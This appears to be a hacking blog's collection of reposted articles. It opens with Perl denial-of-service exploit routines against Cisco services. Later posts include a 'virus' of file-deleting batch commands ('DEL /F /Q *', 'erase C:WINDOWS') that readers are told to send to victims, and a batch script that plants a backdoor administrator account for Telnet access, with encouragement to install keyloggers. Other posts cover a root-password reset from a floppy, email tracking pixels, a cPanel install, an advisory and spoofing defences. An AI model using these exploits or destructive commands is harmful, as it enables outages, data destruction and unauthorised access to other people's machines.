printf "Please enter a server's open port : ";
$ports = ;
chomp $ports;
printf "\nNow checking server status ...\n";
sleep(2);

socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
my $dest = sockaddr_in ($ports, inet_aton($ip));
connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
exit(1);
}

sub cisco6 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
my $ip = $host;
my $vln = "%%%%%XX%%%%%";
my $num = 30000;
my $string .= $vln x $num;
my $shc="\015\012";

my $sockd = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $ip,
PeerPort => "(2002)",
) || die "Unable to connect to $ip:2002 ...\n\n";

$sockd->autoflush(1);
print $sockd "$string" . $shc;
while (<$sockd>){ print }
print "Packet sent ...\n";
close($sockd);
sleep(1);
print("Now checking server's status ...\n");
sleep(2);

my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>"(2002)",);
unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"};

print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
exit(1);
}
sub cisco7 # Cisco IOS HTTP server DoS Vulnerability
{
my $serv = $host;
my $vuln = "GET /TEST?/ HTTP/1.0";

my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server detected on $serv ...\n\n"};

print $sockd "$vuln\n\n";
print "Packet sent ...\n";
close($sockd);
sleep(1);
print("Now checking server's status ...\n");
sleep(2);

my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
close($sockd2);
exit(1);
}

try this ok....if error contact me

How To Install CPANEL on your VPS

2010-01-28T18:37:00.000-08:00

Lets start giving some use to all our VPS servers, lets install a trial or a final license of Cpanel.

If you want a cpanel license you can get 1 for $ 12 / month or 70/month for a 10 pack. You should contact Aaron Conklin at custom.orders@ev1servers.net

In case you want a trial licence for cpanel you should go to : http://www.cpanel.net/store/

Ok. Few Steps to setup your VPS-CPANEL:

1 - Login to your VZMC and get inside your server
2 - Create a new VPS with the Sample Ve Config call vps.cpanel
3 - Select the ips you want to use in that VPS and the dns servers.
4 - Select RedHat Enterprise Template (not minimal)
5 - Dont select any addon.You dont need it for cpanel.
6 - Select the Space / Memory / CPU . All the normal stuff of your normal VPS. Put Start on boot and the rest of the normal stuff. Rememeber to use unlimited VPs.
7 - Go to your Ev1 Member section, open a ticket with your IP / and root password and request ev1 to get your VPS register in up2date. CHECK IT IF IT IS WELL CONFIGURE!! JUST IN CASE.
8 - Go in ssh and do the following steps:
mkdir /home/cpins
cd /home/cpins
wget http://layer1.cpanel.net/latest
sh latest

Article provided by WebHostGear.com

This should install cpanel without asking you any questions.

If you have any problems you should check: http://www.cpanel.net/install.html

9 - Login to : https://xxx.xxx.xxx.xxx:2087 and setup your server.
If you never setup a cpanel server, you can find some usefull information here: http://www.cpanel.net/docs.htm or search ev1 forum or ask me. I will be happy to help.

Well. Hopefully for some of you was usefull and will give you something else to try/offer in your VPS server.

Btw, it needs atleast 128 MB for cpanel to work.

If you have any problems with the guide let me know.

carlos

ps: i talk to some sw-soft people and they recomend to enable second-level quota (QUOTAUGIDLIMIT), i didnt try it myself. But i will let everyone when i try it.

Thanks to theuruguayan on the devilzc0de forums

reference:http://www.webhostgear.com/208.html

Buffer overrun in repr() for UCS-4 encoded unicode strings

2009-12-15T05:22:00.000-08:00

Python Security Advisory

Advisory ID: PSF-2006-001
Issue Date: October 12, 2006
Product: Python
Versions: 2.2, 2.3 prior to 2.3.6, 2.4 prior to 2.4.4, wide unicode (UCS-4) builds only
CVE Names: CAN-2006-4980

Python is an interpreted, interactive, object-oriented programming language. It is often compared to Tcl, Perl, Scheme or Java.

The Python development team has discovered a flaw in the repr() implementation of Unicode string objects which can lead to execution of arbitrary code due to an overflow in a buffer allocated with insufficient size.

The flaw only manifests itself in Python builds configured to support UCS-4 Unicode strings (using the --enable-unicode=ucs4 configure flag). This is still not the default, which is why the vulnerability should not be present in most Python builds out there, especially not the builds for the Windows or Mac OS X platform provided by www.python.org.

You can find out whether you are running a UCS-4 enabled build by looking at the sys.maxunicode attribute: it is 65535 in a UCS-2 build and 1114111 in a UCS-4 build.

More information can be found in this posting to the python-dev mailing list: http://mail.python.org/pipermail/python-dev/2006-October/069260.html

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2006-4980 to this issue.

Python 2.4.4 and Python 2.3.6 are available from www.python.org and contain a fix for this issue. Python 2.5 also contains the fix and is not vulnerable.

Patches for Python 2.2, 2.3 and 2.4 are also immediately available:

* http://python.org/files/news/security/PSF-2006-001/patch-2.3.txt (Python 2.2, 2.3)
* http://python.org/files/news/security/PSF-2006-001/patch-2.4.txt (Python 2.4)

Acknowledgement: thanks to Benjamin C. Wiley Sittler for discovering this issue.

reference:python.org

Rooting Linux with a floppy

2009-12-03T10:12:00.000-08:00

You have lost your root password on your linux box and now you consider formatting
everythign to regain control? Your admin is a moron that leaves the server available
physically for everybody? You wanna test your Linux box? Don’t worry if you have at least
a floppy rescue disk under hand,you can root it ;-) )

The problem with the new version of Linux since 6.2 is :

a)the shadow suit that is installed by default (masking the password in the shadow file)

b)the md5 encryption ( 34 characters vs 13 for standard DES) so it’s not as easy as it was
in teh previous versions i.e. to simply get the /etc/passwd file and running JtR against it
doesn’t work anymore.

What to do now? Follow the guide :

1- Boot with a rescue disk

2- type the appropriate key to get into rescue mode (ex.F4)

3- linux rescue (to get into this mode)

4- $ mknod /dev/hda (to create a virtual HD)

* * * N o t e * * *

If you have more than one partition on your HD, check which one is the Linux partition:

A- $ fdisk /dev/hda

B-( fdisk) : p (to show the current partitions) : m (for commands)

5- $ mknod /dev/hda2 ( create the partition2 device if you have a DOS partition as primary
partition for example)

6- $ mkdir /data (to create a virtual directory in the RAM drive)

7- $ mount -t ext2 /dev/hda2 /data ( to mount the files in the virtual dir located in the
RAM drive)

8-$ cd /data/etc

9- $ chmod 700 /data/etc/shadow
or $ chmod u+w /data/etc/shadow ( to gain write access on the shadow file)

10-$ /data/bin/vi /data/etc/shadow (to edit the shadow file with VI editor)

11- type i to insert then remove the root password by positionning the cursor on the
characters and type the x key

12- type escape key then ” : ”

13- save the file with : wq!

At this point, everything you have done is in RAM and nothing is done on the HD so DON’T
REBOOT YET!!

14- $ cd / (to return back to /)

15- $ umount /data

16- $ init 0 (rebooting the system)

Now you can log in as root; there is no password protecting root anymore.

Take care everyone, Just1ce.

reference:http://www.exploitx.com/69/rooting-linux-with-a-floppy/

Linux > More on USER ID, Password, and Group management

2009-11-30T15:37:00.000-08:00

n order login into Linux system (over ssh or other services ) you need a username and password.
Username and password stored in /etc/passwd and /etc/shadow file respectively. When you supplies password, it encrypts and compare with password stored in /etc/shadow, which is also in, encrypted format (it was stored when you or system administrator registers/updates it). If both are equal, you are in. Once logged in, you become the number to Linux kernel. You can obtain your user id and other information using id command:

$ id
uid=1002(vivek) gid=1002(vivek) groups=1002(vivek), 0(wheel)

Where,
=> Username = vivek
=> User numeric id (uid) = 1002

Numbers are uses to represent users and groups in Linux kernel because:
1) Simplified user and group management
2) Security management easy
3) Your UID applied to all files you create

It is always good idea to use the UID more than 1000 for all users for security reason.
Zero UID

The UID number 0 is special and used by the root user. The zero (0) UID enjoys the unrestricted/unlimited access to Linux system. Note that 0 UID assigned to name root; if you wish you can change this (poorly written program may fail) and assign different name.

Similarly, you have group id (GID). It is use by Linux to refer group names. Single user can be member of multiple groups. This result into very good flexibility for access the system and the sharing files. Many UNIX system uses wheel group as power user group. Like the UID value, zero GID value zero enjoys the unrestricted/unlimited access to Linux system.

Some time Linux and other UNIX like (FreeBSD, Solaris etc) uses EUID, RUID, and SUID concept.
The Effective User ID (EUID)

It is use to determine what level of access the current process has. When EUID is zero then the process has unrestricted/unlimited access. Following commands can be used to print Effective User ID under Linux:
$ whoami
$ id -un
The Real User ID (RUID):

It is use to identify who you actually are. Once it is setup by system (usually login program) it cannot be change till your session terminates. You cannot change your RUID. Only root (or person having zero UID) can change the RUID. Use the command id as follows to obtain Real user ID:
$ id –ru
The Saved User ID (SUID):

When new process / executable file such as passwd, started the effective user id that is in force at the time is copied to the saved user id. Because of this feature, you are able to update your own password stored in /etc/shadow file. Off course, executable file must have set-user-id bit on in order to setuid (system call). Before process ending itself it switches back to SUID.

In short,

* RUID : Identify the real user, normal user cannot change it.
* EUID : Decides access level, normal user can change it.
* SUID : Saves the EUID, normal user cannot change it.
* Real Group ID : Identify the real group
* Effective Group ID and Supplementary group ID : Decides access level

Note that access level means kernel can determine whether you have access to devices, files etc.

reference: http://www.cyberciti.biz/

Source Address Spoofing

2009-11-22T07:58:00.000-08:00

by Rik Farrow

Network Magazine

Networks rely on the truth. Without accurate information, networks work poorly, if at all. However, there are those who use lies to deceive networks and the systems attached to them. These lies can take many forms, such as source address spoofing, but lie detectors exist to help you spot falsehoods and keep your network secure.

Source address spoofing alters a packet's return address so that the packet appears to have come from a source other than the sender. An attacker uses source address spoofing for two reasons: to gain access to resources that only accept requests from specific source addresses, or to hide the source of an attack.

Attackers have used this technique for many years. In fact, the Distributed Denial of Service (DDoS) attacks launched against commercial sites in February 2000 used source address spoofing. Other forms of attack also employ this technique, but most of them would prove unsuccessful today—except for those involving SNMP.

Source address spoofing is often misunderstood, and therefore a cause for concern. Without preventative measures in place, you could become a victim of source addressing spoofing. (A more likely scenario would turn you into an unknowing source of a source-address-spoofing attack.)
On This Page

Local And Remote
Source Route
Hiding The Source
How To Get Spoof-Proof
Tell Me No Lies
Local And Remote

While relying on source addresses to protect services is not a good idea, software that is oriented toward the source of requests is still common. For example, SNMP—a security disaster—often attempts to protect agents on network devices or systems by only accepting requests from specific source addresses. Also, UNIX r commands, the Network File System (NFS), Server Message Block (SMB), and TCP wrappers all include the source address (or system name, in the case of NFS) as part of the access control checks.

These services are especially vulnerable to local attacks in unswitched networks. This is because it is easy for an attacker to sniff packets in an unswitched network, and sniffing contributes to the success of most attacks. On the other hand, switched networks make it difficult (if not impossible) to sniff packets.

SNMP is a good example. Suppose SNMP agents have been configured to only respond to requests for information or changing variables from a server at the address 10.2.2.98. Using netcat, a tool for sending or receiving IP packets, an attacker can easily spoof a request from 10.2.2.98 and send it to the agent of his or her choice.

When the agent responds, it will send the response back to 10.2.2.98. The real manager will ignore the response, as it won't correspond to any outstanding request. The attacker, however, will need to sniff the response off the network for the attack to succeed, as the response was routed back to the real SNMP manager.

Even if the attacker cannot sniff the response, the attack might still succeed, as variables can be successfully changed (via an SNMP set command) without seeing the response. If the attacker shares the same subnet with the manager, the attacker might use Reverse Address Resolution Protocol (RARP) to masquerade as the manager of the IP address.

Remote attacks that seek access via source address spoofing must also have some way of seeing the return packets. Keep in mind that when a remote attacker spoofs some other network's source address, the responses will be routed to that other network, and the attacker will not receive those packets. Of course, the attacker might be able to sniff along the route to the other network. This type of attack, which requires breaking into systems located within ISPs or other intermediate networks, has been successfully carried out.
Top Of Page
Source Route

Another old trick that may still work involves source routing. Source routing is an IP option used today mainly by network managers to check connectivity. Normally, when an IP packet leaves a system, its path is controlled by the routers and their current configuration. Source routing provides a means to override the control of the routers.

Source routing can be strict or loose. Strict source routing lets a manager specify the path through all the routers to the destination. Return responses use the same path in reverse. Loose source routing lets managers specify an address that the packet must pass through on its way to the destination. It is loose source routing that aids an attacker.

A remote attacker might seek to access a UNIX system protected with TCP wrappers, or a Windows NT Internet Information Server (IIS) protected by an access list based on source addresses. If the attacker simply spoofs one of the permitted source addresses, the attacker may never get a response. However, if the attacker both spoofs an address and sets the loose-source-routing option to force the response to return to the attacker's network, the attack can succeed.

The simplest defense against loose source routing is to not permit these packets to enter (or leave) the network. Just about any firewall will block any packet that has source routing enabled by default. You can also configure routers to block packets with source routing. TCP wrappers and many UNIX OSs can also block source-routed packets.

An attacker might also attempt "blind spoofing" to gain access to a system that "protects" itself by checking source addresses. In blind spoofing, the attacker may not need to see the responses for the attack to be successful. The first known version of this attack was launched against security specialist Tsutomu Shimomura in 1994. Shimomura was using TCP wrappers to protect his UNIX system from unauthorized access. However, the attacker succeeded by guessing the sequence numbers used in the response packets during the attack, which enabled the attack to change the configuration of the targeted system.

Sequence number attacks have become much less likely because OS vendors have changed the way initial sequence numbers are generated. The old way was to add a constant value to the next initial sequence number; newer mechanisms use a randomized value for the initial sequence number. (There are some constraints on this "random" value, however, to keep it from working incorrectly.)

Using the source address to authorize a network request is not safe. To improve your security, replace r commands with Secure Shell (SSH), and only use NFS and SMB with improved authentication (SMB has stronger authentication in all versions beyond Windows for Workgroups).

SNMP 1 and SNMP 2 still rely on source addresses for security. While you can block SNMP at the borders of your networks, you will remain vulnerable to SNMP-based scanning and attacks on your internal networks until SNMP 3 has been implemented and installed.
Top Of Page
Hiding The Source

Besides spoofing source addresses for phony authentication, attackers can also spoof their own source addresses in attacks where reply packets are not important. Any network-based Denial of Service (DoS) attack fits this description because the point of the attack is not to get a response but instead to flood the target with requests.

In DoS attacks, it actually makes more sense for the attacker to spoof the source address, otherwise the attacker might wind up blocking his or her own access to the network. Spoofing source addresses also makes tracking the attack much more difficult, as the packets themselves must be traced on each network and subnet, back to the source.

Source address spoofing requires root access on UNIX systems. The attacker must have root access so that the attack software can open a "raw" network socket. Most applications use "cooked" sockets, in which the IP stack provides the necessary packet headers. A raw socket means that the application must prepare the necessary headers itself—that is, do its own cooking. This permits the attacker to put any information he or she wants in the headers, including spoofed source addresses. Note that Windows NT also supports raw sockets, so this is not just a UNIX issue.
Top Of Page
How To Get Spoof-Proof

DoS attacks that use source address spoofing became popular in 1997. RFC 2267 was written in response to this type of attack. It suggests that ISPs practice ingress filtering (see Distributed Denial of Service Attacks, March 2000). In general terms, this means that ISPs should filter traffic and drop any packets with spoofed source addresses. In practical terms, this has proven difficult.

One problem is that many ISPs do not have the technical ability to arrange packet filtering to block packets with spoofed source addresses. Also, many complain that packet filtering reduces equipment performance. While this was true in the past, it is not so today. In the early 1990s, adding packet filtering to a Cisco Systems router could cut throughput by as much as 70 percent. Today, routers have better designs, and it is possible on some routers to block packets with spoofed source addresses with no effect on throughput at all.

For example, Cisco Express Forwarding (CEF) is an advanced IP switching technology, designed for high-performance layer-3 IP backbone switching. You can configure this by executing the following command while in configuration mode:

ip verify unicast reverse-path

A router (or a layer-3 switch) bases routing decisions on the destination address and the routing information. Using the same mechanism, a router can examine the source address and determine if it came from the correct interface. (The route to the source leads back the way it arrived.)

If the route is not the same, the source address must be spoofed, unless asymmetric routes are being used. Asymmetric routes mean that there is more than one way to reach the destination. If asymmetric routing is not in use, enabling this facility will block all packets with spoofed source addresses.

Linux and Berkeley Software Distribution (BSD) system kernels also support a similar facility. If you are using a Linux or BSD system as a router or terminal server, either can be configured to block packets with spoofed source addresses (merely by setting a kernel parameter). In Linux systems, you can enable this mechanism by echoing "2" to each rp_filter name found in the /proc file system (/proc/sys/net/ ipv4/conf/*/rp_filter).

Terminal servers can also block packets with spoofed source addresses. Some terminal servers do this by default. Others can do this by applying an access control list to the Ethernet connection coming from the terminal server (rather than on each incoming modem port). Reports posted to SecurityFocus.com's Bugtraq archives indicated no performance loss at all: CPU usage did increase, but it remained well below 50 percent utilization.
Top Of Page
Tell Me No Lies

The simple solution is to block packets with obviously spoofed source addresses from entering your network. Most firewalls do this by default. If you use packet filters, block packets as they enter the external interface if they have internal source addresses, private network addresses, or the local host address (127/8).

Source address spoofing does not need to be a problem—mechanisms for thwarting it abound. Take the time to be a good Netizen and block these packets at the border of your network. Stop lying packets at the source.

Rik Farrow is an independent security consultant. His Web site, http://www.spirit.com, contains security links and information about network and computer security courses. He can be reached at mailto: rik@spirit.com.
Resources

Computer security expert Wietse Venema's Web site includes information about TCP wrappers. Go to http://www.porcupine.org.

Reports about configuring terminal servers and routers to block spoofed source addresses are available from SecurityFocus.com's Bugtraq archives.

RFC 2267, entitled "Defeating Denial of Service Attacks which Employ IP Source Address Spoofing," is available at http://www.faqs.org/rfcs/rfc2267.html.

reference:http://technet.microsoft.com/en-us/library/cc723706.aspx

WP-Cumulus updated to address yet another security issue

2009-11-17T20:17:00.000-08:00

A few weeks ago I rushed out an update to fix a potentially dangerous Cross-Site Scripting (XSS) vulnerability in WP-Cumulus. With the PHP part of the plugin shielded from ‘outside use’, I was hoping no more issues would pop up. Still, I’m glad MustLive alerted me to another issue that uses the Flash movie itself. The exploit worked by calling the SWF file directly, and supplying link with javascript. I’m not quite sure how dangerous this is, but I’ve modified the movie so it only executes regular links.

Please update your copy of WP-Cumulus to 1.23 asap. For most users it should only take two clicks.

The should not affect how WP-Cumulus works on WordPress blogs. But there have been a number of ports and other projects that use the Flash movie. I urge the authors of those projects to examine the new Flash movie, and see if it still works in/with their product. The exploit is not unique to WordPress, and they may need to modify the security check to fit their project.

reference:http://www.roytanck.com/

10 Really Useful Server Monitoring Tools

2009-11-16T16:02:00.000-08:00

1. Pingdom

Pingdom, which is also available as an iPhone application, makes sure that your website is reachable and responding properly at all times, providing you with email and SMS alerts if it’s not. It monitors uptime and overall performance, creating charts and tables that are easy to understand, enabling you to spot trends and accurately pinpoint problems.

2. Dotcom-Monitor

Dotcom-Monitor is an advanced website monitoring service which maximises your uptime so that you can increase sales and provide a continuous service to customers worldwide, protecting the reputation of your business. It provides real-time and email reports and charts, and sends alerts to exactly the right people when problems arise. It even lets you create multiple logins for numerous users, each of which have permission to access different parts of the tool.

3. McAfee Secure

McAfee Secure monitors your servers for potential security breaches, protecting end-users of your website from identity theft, credit card fraud, spyware, spam, viruses and online scams. Your site is tested and certified daily, and awarded the “live” McAfee Secure mark to show that it has passed its daily test, which greatly increases shopper confidence. McAfee currently certify over 80,000 websites, all of which are listed on the McAfee Secure database.

4. Webmetrics GlobalWatch

GlobalWatch monitors a diverse range of websites, internet applications and services. It identifies and diagnoses downtime, errors and poorly performing transactions, providing performance measurements, detailed reports and flexible alerts. This powerful tool, which supports Web 2.0, AJAX and plugin-based applications like Flash and Java, gives you a truly global perspective on how end-users see your site with monitoring agents stationed in the USA, Asia, Africa and Europe.

5. Nimsoft Monitoring Solutions (NMS)

NMS monitors your servers and their configured server applications. All core server resources, from CPU to memory, event logs, print jobs and queues are accounted for. NMS is not only quick and easy to install, but lightweight (you only install the bits that you really need) and scalable (you can monitor hundreds and even thousands of servers at a time). The NMS dashboard is simple and clear with views showing all your servers interconnected, colour-coded status indicators and server-to-server response times.

6. Solarwinds Orion Network Performance Monitor (NPM)

Orion NPM makes sure that every one of your servers is working 100% efficiently, but it doesn’t stop there: it monitors all routers, switches and wireless access points in your network too. It’s quick to set up, very attractive (a rarity in server monitoring) and supported by hundreds of expert network engineers. What’s more, you don’t have to be an expert yourself to use it: anyone can get it up and running in under an hour, straight out of the box.

7. Nagios

Nagios is a comprehensive IT infrastructure monitoring system that provides a snapshot of your entire operations network while keeping tabs on the health and status of all your applications, services, operating systems, network protocols and system metrics. Instant alerts are sent to your IT staff by email and SMS as soon as problems arise and failed servers, applications and devices can be restarted automatically. Nagios is highly compatible with almost all in-house and third party applications.

8. ENVIROMUX Server Environment Monitoring System

This powerful tool, which is perfect for use in data centers, web hosting facilities, telecom switching sites and server closets, monitors temperature, humidity, liquid presence, motion, intrusion and vibration, to ensure that your server’s operating in ideal physical conditions. You can integrate up to eight video cameras into the system to get a live view from anywhere in the world. Nagio’s users get 5% off the list price.

9. Jacarta interSeptor Pro

The interSeptor Pro records and charts temperature and humidity conditions surrounding your server. It alerts you (via email or SMS) when air conditioning settings should be adjusted to maximise energy savings. Three different models are available: the big 8-port (8 different temperature and humidity sensors), the huge 16-port and the massive 24-port. Additional alarm sensors can be added to detect water leaks, smoke and power failures.

10. Simple Server Monitor

Simple Server Monitor provides a substantial monitoring service for those on a tight budget. It costs just $69.95, following a 30-day free trial. Despite its tiny price tag, it’s packed full of useful features including up-to-the-minute monitoring of uptime and accessible performance charts. It uses popup messages, desktop alarms, email and SMS to alert you to any network uptime losses.

reference:http://www.webdesignbooth.com/10-really-useful-server-monitoring-tools/

Good by str0ke...Rest In Peace

2009-11-04T05:41:00.000-08:00

Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.

Sadly....

I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.

We wish nothing but blessing to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

good bye str0ke...your elite...thanks for your officia website....

benchmark SMTP servers

2009-10-25T11:00:00.000-07:00

This is a program I wrote to benchmark SMTP servers. I started work on this because I need to know which mail server will give the best performance with more than 1,000,000 users. I have decided to release it under the GPL because there is no benefit in keeping the source secret, and the world needs to know which mail servers perform well and which don’t!

At the OSDC conference in 2006 I presented a paper on mail relay performance based on the new BHM program that is now part of Postal.

I have a Postal category on my main blog that I use for a variety of news related to Postal. This post (which will be updated periodically) will be the main reference page for the software. Please use the comments section for bug reports and feature requests.

It works by taking a list of email addresses to use as FROM and TO addresses. I originally used a template to generate the list of users because if each email address takes 30 bytes of storage then 3,000,000 accounts would take 90M of RAM which would be more than the memory in the test machine I was using at the time. Since that time the RAM size in commodity machines has increased far faster than the size of ISP mail servers so I removed the template feature (which seemed to confuse many people).

When sending the mail the subject and body will be random data. A header field X-Postal will be used so that procmail can easily filter out such email just in case you accidentally put your own email address as one of the test addresses. ;)

I have now added two new programs to the suite, postal-list, and rabid. Postal-list will list all the possible expansions for an
account name (used for creating a list of accounts to create on your test server). Rabid is the mad Biff, it is a POP benchmark.

Postal now adds a MD5 checksum to all messages it sends (checksum is over the subject and message body including the “\r\n” that ends each line of text in the SMTP protocol). Rabid now checks the MD5 checksum and displays error messages when it doesn’t match.

I have added rate limiting support in Rabid and Postal. This means that you can specify that these programs send a specific number of messages and perform a specific number of POP connections per minute respectively. This should make it easy to determine the amount of system resources that are used by a particular volume of traffic. Also if you want to run performance analysis software to determine what the bottlenecks are on your mail server then you could set Postal and Rabid to only use half the maximum speed (so the CPU and disk usage of the analysis software won’t impact on the mail server).

I will not release a 1.0 version until the following features are implemented:

* Matching email sent by Postal and mail received by BHM and Rabid to ensure that each message is delivered correctly (no repeats and no corruption)

* IMAP support in Rabid that works

* Support for simulating large numbers of source addresses in Postal. This needs to support at least 2^24 addresses so it is entirely impractical to have so many IP addresses permanently assigned to the test machine.

* Support for simulating slow servers in Postal and BHM (probably reducing TCP window size and delaying read() calls)

* Making BHM simulate the more common anti-spam measures that are in use to determine the impact that they have on list servers

* Determining a solution to the problem of benchmarking DNS servers. This may mean just including documentation on how to simulate the use patterns of a mail server using someone else’s DNS benchmark, but may mean writing my own DNS benchmark.

download link: http://www.coker.com.au/postal/postal-0.70.tgz

reference: http://doc.coker.com.au/projects/postal/

Geany

2009-10-24T06:16:00.000-07:00

Since a specific dependency can be passed as parameter when the makefile is called I guess an IDE uses this to execute the required command. For example:

COMPILER = /usr/local/cris/bin/gcc-cris
CFLAGS = -mlinux -o
SOURCES = main.c
TARGET = Hello_World
DESTINATION = root@FOXBoard:/mnt/flash/bin/HelloWorld

# top-level rule to create the program, executed by default if no params are provided
all: compile

# Called by pressing the Compile or Build button in Geanny
compile: $(SOURCES)
$(COMPILER) $(CFLAGS) $(TARGET) $(SOURCES)

build: compile

scp $(TARGET) $(DESTINATION)

When the command make compile is executed, the code is only compiled. When the command make build it first executes the compile dependency and than copies the executable to the target. I would expect that the IDE provides the basic menu structure and allows the programmer to enter the command to execute when the menu item is selected. In that case, it’s easy to integrate custom compilers or special target needs in the default IDE.

After spending a hour searching how this works in Anjuta I could not find how to make this work. It might be that Anjuta is already to complex for what I want, it is designed for working with huge open source projects, in my case it will be a couple of local files that need to be managed.

Searching the internet for a simple Linux IDE results in several hits refering to Geany. The home page states “It was developed to provide a small and fast IDE, which has only a few dependencies from other packages”. Sounds like this is what I’m looking for. Using the Applications | Add/Remove… menu in Ubuntu shows that Geany can automaticly be installed.

After installation and starting Geany it is easy to find your way in this program. First guess is that I will be needing to setup a new project, using the Project | New menu option. It asks for a project name (HelloWorld), the file to store the project settings in (HelloWorld.geany) and the base folder of the project (/home/jan/FOXBoard/HelloWorld). After pressing the create button I can open the files that I already created before manually (main.c).

After opening the main.c file the Build menu options are enabled. Selection the Build | Compile menu command shows that gcc is used for compiling the application and that no errors are found. Nice, but I don’t want gcc but I want gcc-cris to be used, or actually I want that make is called with my own parameter.

In the Build menu there is an option available Set includes and arguments, selecting this option shows a dialog that offers three input fields to enter commands for Compile, Build and Execute. Here the gcc command is listed, I guess these commands are indeed given to Linux to execute so entering make compile in the Compile field, make build in the Build field and make build in the Execute field should do the trick. After pressing the OK button and selecting Build | Compile the Compiler shows in blue the execute command (make compile (in directory:/home/jan/FOXBoard/HelloWorld)) and the output of the make program (/usr/local/cris/bin/gcc-cris -mlinux -o Hello_World main.c). After a second a blue message indicates that the Compilation finished successfully. The Build | Build menu command or the Build | Execute command does the same with the addition of executing the secure copy as well.

In the Edit | Preferences menu you can select in the Toolbar tab the option to display a Compile and Run button. These buttons call the Build | Compile menu (and so make compile) and the Build | Execute menu (and so make build) to make life even more easy.

On purpose a mistake is made in main.c to check how errors are handled. The printf is replaced by pri ntf, after pressing compile it shows an error in the Compiler tab and highlights the error in main.c. Very, very nice! It looks like I found my base for the developing code, next step would be to include a debugger as well.

reference : animalrobots

how mailtracking(dot)com actully works.. get data from image

2009-10-21T20:07:00.000-07:00

on the front end.......
once we register our mail with

mailtracking(dot)com

then we just have to add

.mailtracking.com to the email addresses we have to send to

we can send email which they keep track and send us updates like..,

when it was opened,
to whom it was sent,
etc... etc..

//************************************************************//

real facts behind this trick
first of all,
when we add

.mailtracking.com

we are just sending our mail to them (their server)..
proof : check the mail headers of the recipients, its actually from (something).mailtracking(dot)com,
or check mailed by option in the received email in gmail, it will be like this : "mailed-by gmail.com.scdvbkrtxrndmvk.mailtracking.com"

//***********************************************************//

second,
they add few files which a normal and average user won't recognise..
they add transparent images as shown below..

these 2 are their images (steganography)

http://www.4fvxdj81zkxzh8.mailtracking.com/nocache/4fvxdj81zkxzh9/footer0.gif

size 1x1 px

http://www.4fvxdj81zkxzhh.mailtracking.com/nocache/4fvxdj81zkxzhQ/rspr47.gif

size 4x7 px

and

https://tssls.4fvxdj81zkxzhv.MailTracking.com/nocache/4fvxdj81zkxzhv/rspr47.wav

otally 3 files..
these files are added to email with html tags like etc...
and send to your recipients address..

//************************************************************//

when the user opens the image, the image is retrieved from their server, hence, your user agent is captured and so is the ip address..

and you get info that your victim has read the email, or has forwarded

//***********************************************************//

and the funny part is,
people still don't realize this..
when the image is being retrieved, the server recognizes the user agent, ip address etc..
you wil get their ip, user agent, computer they use, etc...

hack and enjoy...!!!

reference: cyberterrorist

How to make a powerfull virus with only notepad

2009-10-21T19:59:00.000-07:00

****************( Works only for Linux and Win XP )****************

To delete all folders/files just put this:

DEL /F /Q *

Into notpad and save it as whateveryouwant.cmd

It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.

WARNING!!! DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER

If you just want to delete the WINDOWS file do this:
The only thing you need again is Notepad.
Now, to test it, create a textfile called TEST.txt in C:
Now in your notepad type "erase C:TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C: and you'll see your Test.txt is gone. Now, the real work begins:
Go to Notpad and type erase C:WINDOWS (or C:LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.
Simple explanation:
Go to notepad, type erase C:WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again

reference:cyberterrorist

Hacking a Local Terminal

2009-10-13T08:36:00.000-07:00

For the screenshots, I'll be using my Desktop PC and my Samsung Q1.

You will need a USB Flash Drive and a separate computer connected to the same network.

Wait until the target computer is available for use (maybe the person got up to check on something, who knows). As you enter the computer, you can do 2 things:

1) Have a batch ready on your flash drive. The code should be a little something like this:

@echo off
net user SupportUser codemachine /add
net localgroup administrators SupportUser /add

Good, this batch creates a backdoor administrator account on your target terminal. The second option was to do it by hand, but who wants to do that? The chances of having the time being cut short because of your flash drive being recognized are high, that's my opinion.

Go to the Control Panel > Administrative Tools > Services > Telnet
Make sure that the Telnet service is online.

Now scram, get out of there and head to your other computer. At a safe place, open up your Command prompt (or whatever you're using, I use Putty sometimes even though it sucks) and enter:

telnet 192.168.*.*

You should get a message asking I'd you want to continue..

You are about to send your password information to a remote computer in Internet zone. This might not be safe. Do you want to send anyway(y/n):

..otherwise you get the login screen. Enter your backdoor information and login. From there you can surf the directories and change peoples passwords. You can install a keylogger to everyones' startup directory, for example.

If you are in a hurry and want to destroy someones PC forever, have someone sitting with the other PC and after you make your backdoor, instantly delete everything. Its very simple, my brother broke his macbook so he was using our old dell laptop. When he was out, I installed a backdoor and began messing around with him while he was online. For example, at the expense of my own Internet, I overloaded the connection and got him to shutdown. When he rebooted, his password was changed!

Have fun and stay safe! ;)

reference:hackforums

linux shell commands

2009-10-02T09:46:00.000-07:00

